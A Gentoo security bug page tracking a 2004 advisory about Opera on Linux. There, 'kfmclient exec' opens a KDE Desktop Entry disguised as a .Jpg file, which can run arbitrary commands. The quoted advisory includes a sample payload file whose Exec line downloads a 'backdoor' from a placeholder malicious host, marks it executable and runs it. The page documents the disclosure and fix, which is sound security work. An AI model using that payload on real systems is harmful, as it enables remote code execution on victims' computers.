Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 74321 - net-www/opera Possible execution of remote shell commands with kfmclient
Summary: net-www/opera Possible execution of remote shell commands with kfmclient
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All All
: High normal (vote)
Assignee: Gentoo Security
URL: http://www.zone-h.org/advisories/read...
Whiteboard: B2 [glsa] jaervosz
Keywords:
: 74530 (view as bug list)
Depends on:
Blocks:
 
Reported: 2004-12-13 13:31 UTC by Sune Kloppenborg Jeppesen
Modified: 2005-02-14 11:40 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Sune Kloppenborg Jeppesen gentoo-dev 2004-12-13 13:31:11 UTC
[ZH2004-19SA] Possible execution of remote shell commands in Opera with kfmclient.


  
 12/12/2004
  
 Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org

Tested version:
Opera 7.54 linux version with Kde 3.2.3



Problem:
=======
Opera for linux uses "kfmclient exec" as "Default Application" to handle 
saved files.
This could be used by malicious remote users to execute arbitrary shell 
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop Entry" and therefore execute the command within the "Exec=" entry.


Example of [KDE Desktop Entry]:


________________________________


# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________



Possible method of Exploitation
=========================


This method of exploitation needs that a particular file name extension
is used.
If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , the command in "Exec=" entry will be executed.
Instead, If "page.htm" is used as file name, it will not be opened like a "kde desktop entry" but it will be viewed in konqueror.
It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since 
the "system" is case sensitive.



Attack scenario:


1- A user clicks on a link which requires http://malicious_server/image.Jpg


2- malicious_server responds with an unknown Content-Type field , for 
example Content-Type: image/Jpeg. (note the dot at the end), so Opera will show a dialog window.


3- if a user chooses "Open" to view image.Jpg, it will be opened by 
"kfmclient exec" command, since kfmclient is the "Default Application"


4- Image.Jpg is a kde desktop entry :


--------image.Jpg----------


# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0


---- end of image.Jpg-------


Note: \t is an horizontal tab.
In this case a backdoor will be downloaded on victim's computer and executed.



Solution:
========
Disable "kfmclient exec" as default application
Comment 1 Thierry Carrez (RETIRED) gentoo-dev 2004-12-14 02:48:28 UTC
Looks real... but can't confirm as I don't use Opera.
Comment 2 Thierry Carrez (RETIRED) gentoo-dev 2004-12-15 12:16:18 UTC
*** Bug 74530 has been marked as a duplicate of this bug. ***
Comment 3 Thierry Carrez (RETIRED) gentoo-dev 2004-12-21 06:29:43 UTC
This is not fixed in 7.54u1.
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2005-02-11 05:17:27 UTC
Ready with bug 73871
Comment 5 Sune Kloppenborg Jeppesen gentoo-dev 2005-02-14 11:40:23 UTC
GLSA 200502-17